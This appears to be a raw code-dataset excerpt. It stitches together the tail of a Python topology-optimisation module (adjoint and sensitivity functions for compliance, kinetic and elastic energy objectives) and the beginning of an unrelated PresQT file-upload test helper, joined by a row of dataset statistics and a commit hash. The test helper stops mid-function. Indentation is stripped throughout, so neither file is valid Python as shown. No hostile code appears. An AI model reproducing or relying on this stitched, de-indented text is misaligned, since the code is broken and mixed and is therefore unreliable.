ind_passive (:obj:`numpy.array`): Index of passive elements.
passive_el (:obj:`numpy.array`): Passive element nodes.
disp_vector (:obj:`numpy.array`): Displacement vector.
dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
omega_par (:obj:`float`): 2 * pi * frequency.
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
Returns:
Lambda parameter solution.
"""
aux1 = np.zeros(ngl, dtype=complex)
fadj = 0
for i, el in enumerate(passive_el):
Ke, _ = fc.matricesQ4(el, coord, connect, E, v, rho)
aux1[ind_passive[i]] = Ke@disp_vector[ind_passive[i]].conjugate()
fadj += aux1
aux1[:] = 0
fadj *= -1/2
lam = spsolve(dyna_stif, fadj)
return lam
def lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho):
""" Calculates the lambda parameter of the local kinetic energy function.
Args:
ngl (:obj:`int`): Degrees of freedom.
ind_passive (:obj:`numpy.array`): Index of passive elements.
passive_el (:obj:`numpy.array`): Passive element nodes.
disp_vector (:obj:`numpy.array`): Displacement vector.
dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
omega_par (:obj:`float`): 2 * pi * frequency.
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
Returns:
Lambda parameter solution.
"""
aux = np.zeros(ngl, dtype=complex)
fadj = 0
for i, el in enumerate(passive_el):
_, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
aux[ind_passive[i]] = Me@disp_vector[ind_passive[i]].conjugate()
fadj += aux
aux[:] = 0
fadj *= -(omega_par**2)/2
lam = spsolve(dyna_stif, fadj)
return lam
def lambda_compliance(disp_vector, load_vector, function):
""" Calculates the lambda parameter of the compliance function.
Args:
disp_vector (:obj:`numpy.array`): Displacement vector.
load_vector (:obj:`numpy.array`): Force vector.
function (:obj:`float`): Function value.
Returns:
Lambda parameter solution.
"""
lam = (disp_vector.conjugate()@load_vector)/function
return lam
def lambda_ep(disp_vector, stif_matrix, dyna_stif, free_ind):
""" Calculates the lambda solution of the elastic potential energy function.
Args:
disp_vector (:obj:`numpy.array`): Displacement vector.
stif_matrix (:obj:`numpy.array`): Stiffness matrix.
dyna_stif (:obj:`numpy.array`): Dynamic stiffness matrix.
free_ind (:obj:`numpy.array`): Free dofs.
Returns:
Lambda parameter solution.
"""
lam = np.zeros(stif_matrix.shape[0], dtype=complex)
if free_ind is not None:
aux = -(1/2) * (stif_matrix[free_ind, :][:, free_ind]@disp_vector[free_ind].conjugate())
lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], aux)
else:
aux = -(1/2) * (stif_matrix@disp_vector.conjugate())
lam = spsolve(dyna_stif, aux)
return lam
def lambda_ek(disp_vector, mass_matrix, dyna_stif, omega_par, free_ind):
""" Calculates the lambda solution of the kinetic energy function.
Args:
disp_vector (:obj:`numpy.array`): Displacement vector.
mass_matrix (:obj:`numpy.array`): Mass matrix.
dyna_stif (array): Stifness matrix.
omega_par (:obj:`float`): 2 * pi * frequency.
free_ind (:obj:`numpy.array`): Free dofs.
Returns:
Lambda parameter solution.
"""
lam = np.zeros(mass_matrix.shape[0], dtype=complex)
if omega_par == 0:
omega_par = 1e-12
if free_ind is not None:
aux = - (omega_par**2) * (mass_matrix[free_ind, :][:, free_ind]@disp_vector[free_ind].conjugate())
lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], aux)
else:
aux = - (omega_par**2) * (mass_matrix@disp_vector.conjugate())
lam = spsolve(dyna_stif, aux)
return lam
def lambda_R(disp_vector, dyna_stif, stif_matrix, mass_matrix, omega_par, fvirg, kinetic_e, free_ind):
""" Calculates the lambda solution of the strain-to-kinetic function.
Args:
disp_vector (:obj:`numpy.array`): Displacement vector.
dyna_stif (array): Stifness matrix.
stif_matrix (:obj:`numpy.array`): Stiffness matrix.
mass_matrix (:obj:`numpy.array`): Mass matrix.
omega_par (:obj:`float`): 2 * pi * frequency.
fvirg (:obj:`float`): Strain-to-kinetic function.
kinetic_e (:obj:`float`):: Kinetic energy.
free_ind (:obj:`numpy.array`): Free dofs.
Returns:
Lambda parameter solution.
"""
lam = np.zeros(mass_matrix.shape[0], dtype=complex)
if omega_par == 0:
omega_par = 1e-12
if free_ind is not None:
aux = - (1/(2*kinetic_e)) * ((stif_matrix[free_ind, :][:, free_ind] - (omega_par**2)*fvirg*mass_matrix[free_ind, :][:, free_ind])@disp_vector[free_ind].conjugate())
lam[free_ind] = spsolve(dyna_stif[free_ind, :][:, free_ind], aux)
else:
aux = - (1/(2*kinetic_e)) * ((stif_matrix - (omega_par**2)*fvirg*mass_matrix)@disp_vector.conjugate())
lam = spsolve(dyna_stif, aux)
return lam
# Or use @nb.njit
# @nb.jit(nopython=True)
def derivative_compliance(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
""" calculates the derivative of the compliance function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency
p_par (:obj:`float`): Penalization power to stiffness.
q_par (:obj:`float`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
lam (:obj:`float`): Lambda parameter.
Returns:
Derivative of the compliance function.
"""
deriv_f = np.empty((len(connect), 1))
dofs = 2
ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
deriv_f[el, 0] = (-lam *(disp_vector[ind].reshape(1, 8)@dKed@disp_vector[ind].reshape(8, 1)))[0,0].real
return deriv_f
def derivative_input_power(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector):
""" Calculates the derivative of the input power function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency
p_par (:obj:`float`): Penalization power to stiffness.
q_par (:obj:`float`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
Returns:
Derivative of the input power function.
"""
deriv_f = np.empty((len(connect), 1))
dofs = 2
ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
a = 1j * (disp_vector[ind].reshape(1, 8)@dKed@disp_vector[ind].reshape(8, 1))[0,0]
deriv_f[el, 0] = -0.5 * omega_par * a.real
return deriv_f
def derivative_ep(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
""" calculates the derivative of the elastic potential energy function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency
p_par (:obj:`float`): Penalization power to stiffness.
q_par (:obj:`float`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement.
lam (:obj:`float`): Lambda parameter.
fvirg (:obj:`float`): Elastic potential energy function.
Returns:
Derivative elastic potential energy function.
"""
deriv_ep = np.empty((len(connect), 1), dtype=complex)
dofs = 2
ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
#dKe1 = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke.conjugate()
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
deriv_ep[el, 0] = (1/4) * (disp_vector[ind].conjugate()@dKe@disp_vector[ind]).real + (lam[ind]@dKed@disp_vector[ind]).real
return deriv_ep
def derivative_ek(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam):
""" Calculates the derivative of the kinetic energy function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency
p_par (:obj:`float`): Penalization power to stiffness.
q_par (:obj:`float`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
lam (:obj:`float`): Lambda parameter.
Returns:
Derivative of the kinetic energy function.
"""
deriv_ek = np.empty((len(connect), 1), dtype=complex)
dofs = 2
ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
deriv_ek[el, 0] = ((omega_par**2)/4) * (disp_vector[ind].conjugate()@dMe@disp_vector[ind]).real + (lam[ind]@dKed@disp_vector[ind]).real
return deriv_ek
def derivative_R(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam, fvirg, kinetic_e):
""" Calculates the derivative of the strain-to-kinetic function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency
p_par (:obj:`float`): Penalization power to stiffness.
q_par (:obj:`float`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
lam (:obj:`float`): Lambda parameter.
fvirg (:obj:`float`): Strain-to-kinetic function.
kinetic_e (:obj:`float`): Kinetic energy function.
Returns:
Derivative of the strain-to-kinetic function function.
"""
deriv_R = np.empty((len(connect), 1), dtype=complex)
dofs = 2
ind_dofs = (np.array([dofs*connect[:,1]-1, dofs*connect[:,1], dofs*connect[:,2]-1, dofs*connect[:,2],
dofs*connect[:,3]-1, dofs*connect[:,3], dofs*connect[:,4]-1, dofs*connect[:,4]], dtype=int)-1).T
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
deriv_R[el, 0] = 1/(4*kinetic_e) * (disp_vector[ind].conjugate()@(dKe - (omega_par**2)*fvirg*dMe)@disp_vector[ind]).real + \
(lam[ind]@dKed@disp_vector[ind]).real
return deriv_R
def derivative_local_ep(passive_el, lam, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha, beta, p_par, q_par):
""" Calculates the derivative of the local elastic potential energy function.
Args:
passive_el (:obj:`numpy.array`): Passive element nodes.
lam (:obj:`float`): Lambda parameter.
ind_dofs (:obj:`numpy.array`, optional): TODO
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
connect (:obj:`numpy.array`): Element connectivity.
coord (:obj:`numpy.array`): Coordinates of the element.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
p_par (:obj:`int`): Penalization power to stiffness.
q_par (:obj:`int`): Penalization power to mass.
Returns:
Derivative of the local elastic potential energy function.
"""
deriv_f = np.empty((len(connect), 1), dtype=complex)
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
if el in passive_el:
deriv_f[el, 0] = (1/4) * ((disp_vector[ind].reshape(1, -1).conjugate() @ dKe @ disp_vector[ind]) + (lam[ind].reshape(1, -1) @ dKed @ disp_vector[ind]).real)[0]
else:
deriv_f[el, 0] = ((lam[ind].reshape(1, -1) @ dKed @ disp_vector[ind]).real)[0]
return deriv_f
def derivative_local_ki(coord, connect, E, v, rho, alpha, beta, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam, ind_dofs, passive_el):
""" Calculates the derivative of the local kinetic energy function.
Args:
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha (:obj:`float`): Damping coefficient proportional to mass.
beta (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency.
p_par (:obj:`int`): Penalization power to stiffness.
q_par (:obj:`int`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
disp_vector (:obj:`numpy.array`): Displacement vector.
lam (:obj:`float`): Lambda parameter.
ind_dofs (:obj:`numpy.array`, optional): TODO
passive_el (:obj:`numpy.array`): Passive element nodes.
Returns:
Derivative of the local input power energy function.
"""
deriv_ek = np.empty((len(connect), 1), dtype=complex)
for el in range(len(connect)):
Ke, Me = fc.matricesQ4(el, coord, connect, E, v, rho)
ind = ind_dofs[el, :]
dKe = p_par * (xval[el]**(p_par - 1))*(1-x_min_k) * Ke
dCe = alpha * Me + beta * dKe
if xval[el]>0.1:
dMe = q_par * (xval[el]**(q_par - 1))*(1-x_min_m) * Me
else:
dMe = ((9*3.512e7*xval[el]**8 - 10*2.081e8*xval[el]**9)*(1-x_min_m) ) * Me
dKed = dKe + omega_par * 1j * dCe - (omega_par**2) * dMe
if el in passive_el:
deriv_ek[el, 0] = ((omega_par**2)/4) * disp_vector[ind].conj().reshape(1, -1)@dMe@disp_vector[ind] + (lam[ind].T@dKed@disp_vector[ind]).real
else:
deriv_ek[el, 0] = (lam[ind]@dKed@disp_vector[ind]).real
return deriv_ek
def derivative_local_R(df_ep, df_ki, fvirg):
""" Calculates the derivative of the local strain-to-kinetic function.
Args:
df_ep (:obj:`numpy.array`): Elastic potential energy derivative.
df_ki (:obj:`numpy.array`): Kinetic energy derivative.
fvirg (:obj:`float`): Local strain-to-kinetic function.
Returns:
Derivative of the local strain-to-kinetic function function.
"""
#fvirg = (ep,ki)
return df_ep * (1/fvirg[1]) - (fvirg[0]/fvirg[1]**2)*df_ki
def derivatives_objective(func_name, fvirg, disp_vector, coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, load_vector=None, mass_matrix=None, stif_matrix=None, dyna_stif=None, free_ind=None, ind_dofs=None, ngl=None, ind_passive=None, passive_el=None):
""" Calculates the derivative of the specified function.
Args:
func_name (:obj:`str`): Objective function used.
fvirg (:obj:`float`): Non-logarithm function value.
disp_vector (:obj:`numpy.array`): Displacement vector.
coord (:obj:`numpy.array`): Coordinates of the element.
connect (:obj:`numpy.array`): Element connectivity.
E (:obj:`float`): Elastic modulus.
v (:obj:`float`): Poisson's ratio.
rho (:obj:`float`): Density.
alpha_par (:obj:`float`): Damping coefficient proportional to mass.
beta_par (:obj:`float`): Damping coefficient proportional to stiffness.
omega_par (:obj:`float`): 2 * pi * frequency.
p_par (:obj:`int`): Penalization power to stiffness.
q_par (:obj:`int`): Penalization power to mass.
x_min_m (:obj:`float`): Minimum relative densities to mass.
x_min_k (:obj:`float`): Minimum relative densities to stiffness.
xval (:obj:`numpy.array`): Indicates where there is mass.
load_vector (:obj:`numpy.array`, optional): Force vector.
mass_matrix (:obj:`numpy.array`, optional): Mass matrix.
stif_matrix (:obj:`numpy.array`, optional): Stiffness matrix.
dyna_stif (:obj:`numpy.array`, optional): Dynamic stiffness matrix.
free_ind (:obj:`numpy.array`, optional): Free dofs.
ind_dofs (:obj:`numpy.array`, optional): Defaults to None.
ngl (:obj:`int`): Degrees of freedom.
ind_passive (:obj:`numpy.array`, optional): Index of passive elements.
passive_el (:obj:`numpy.array`, optional): Passive element nodes.
Returns:
Derivative of the specified function.
"""
if func_name == "compliance":
lam_par = lambda_compliance(disp_vector, load_vector, fvirg)
df0dx = derivative_compliance(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
elif func_name == "elastic_potential_energy":
lam_par = lambda_ep(disp_vector, stif_matrix, dyna_stif, free_ind)
df0dx = derivative_ep(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "input_power":
df0dx = derivative_input_power(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "kinetic_energy":
lam_par = lambda_ek(disp_vector, mass_matrix, dyna_stif, omega_par, free_ind)
df0dx = derivative_ek(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "r_ratio":
if omega_par == 0:
omega_par = 1e-12
kinetic_e = ((1/4) * omega_par**2 * (disp_vector.conjugate()@mass_matrix@disp_vector)).real
lam_par = lambda_R(disp_vector, dyna_stif, stif_matrix, mass_matrix, omega_par, fvirg, kinetic_e, free_ind)
df0dx = derivative_R(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, fvirg, kinetic_e)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "local_ep":
lam_par = lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho)
df0dx = derivative_local_ep(passive_el, lam_par, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha_par, beta_par, p_par, q_par)
#Log Scale
df0dx[:, 0] = 10*df0dx[:, 0] * np.log10(np.exp(1))/fvirg
elif func_name == "local_ki":
lam_par = lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho)
df0dx = derivative_local_ki(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, ind_dofs, passive_el)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/fvirg
elif func_name == "local_r":
lam_par = lambda_local_ep(ngl, ind_passive, passive_el, disp_vector, dyna_stif, coord, connect, E, v, rho)
df_ep = derivative_local_ep(passive_el, lam_par, ind_dofs, xval, disp_vector, connect, coord, E, v, rho, x_min_k, x_min_m, omega_par, alpha_par, beta_par, p_par, q_par)
lam_par = lambda_local_ki(ngl, ind_passive, passive_el, disp_vector, dyna_stif, omega_par, coord, connect, E, v, rho)
df_ki = derivative_local_ki(coord, connect, E, v, rho, alpha_par, beta_par, omega_par, p_par, q_par, x_min_m, x_min_k, xval, disp_vector, lam_par, ind_dofs, passive_el)
df0dx = derivative_local_R(df_ep, df_ki, fvirg)
#Log Scale
df0dx[:, 0] = 10.0*df0dx[:, 0]*np.log10(np.exp(1))/(fvirg[0]/fvirg[1])
return df0dx.real | 49.712204 | 299 | 0.615345 | 3,946 | 27,292 | 4.08591 | 0.045616 | 0.048626 | 0.057247 | 0.025181 | 0.925944 | 0.892576 | 0.860448 | 0.826087 | 0.77132 | 0.752651 | 0 | 0.021117 | 0.233072 | 27,292 | 549 | 300 | 49.712204 | 0.749176 | 0.441155 | 0 | 0.628959 | 0 | 0 | 0.006288 | 0.001696 | 0 | 0 | 0 | 0.003643 | 0 | 1 | 0.067873 | false | 0.085973 | 0.0181 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
598d499f022400a40a8c10902f597b5b2975da35 | 6,498 | py | Python | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 3 | 2019-01-29T19:45:25.000Z | 2020-12-01T18:24:51.000Z | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 419 | 2018-09-13T23:11:15.000Z | 2021-09-22T17:49:00.000Z | presqt/targets/utilities/tests/shared_upload_test_functions.py | djordjetrajkovic/presqt | 8424b61b1c5b8d29de74c7a333889d9e9eb7aee8 | [
"Apache-2.0"
] | 2 | 2020-04-10T08:19:41.000Z | 2021-01-04T15:29:42.000Z | import json
from presqt.utilities import read_file
def process_wait(process_info, ticket_path):
# Wait until the spawned off process finishes in the background to do further validation
while process_info['resource_upload']['status'] == 'in_progress':
try:
process_info = read_file('{}/process_info.json'.format(ticket_path), True)
except json.decoder.JSONDecodeError:
# Pass while the process_info file is being written to
pass
def shared_upload_function_osf(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
# Verify the status code and content
response = test_case_instance.client.post(test_case_instance.url, {
'presqt-file': open(test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(process_info['resource_upload']['message'], 'Upload successful.')
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(process_info['resource_upload']['failed_fixity'], [])
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
def shared_upload_function_github(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
response = test_case_instance.client.post(test_case_instance.url, {'presqt-file': open(
test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(
process_info['resource_upload']['message'], test_case_instance.process_message)
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(
process_info['resource_upload']['failed_fixity'], test_case_instance.failed_fixity)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
def shared_upload_function_gitlab(test_case_instance):
test_case_instance.headers['HTTP_PRESQT_FILE_DUPLICATE_ACTION'] = test_case_instance.duplicate_action
response = test_case_instance.client.post(test_case_instance.url, {'presqt-file': open(
test_case_instance.file, 'rb')}, **test_case_instance.headers)
test_case_instance.ticket_path = 'mediafiles/jobs/{}'.format(test_case_instance.ticket_number)
# Verify status code and message
test_case_instance.assertEqual(response.status_code, 202)
test_case_instance.assertEqual(
response.data['message'], 'The server is processing the request.')
# Verify process_info file status is 'in_progress' initially
